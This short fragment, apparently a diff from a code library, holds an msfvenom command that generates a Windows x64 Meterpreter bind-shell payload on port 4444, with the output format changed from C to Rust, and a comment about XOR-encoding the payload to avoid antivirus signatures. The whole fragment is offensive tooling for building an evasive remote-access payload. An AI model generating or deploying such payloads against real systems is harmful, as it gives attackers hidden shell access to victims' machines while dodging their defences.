Code Library

 msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/bind_tcp \

-LPORT=4444 -f c
+LPORT=4444 -f rust

 # Payload with XOR encoding (avoid signatures)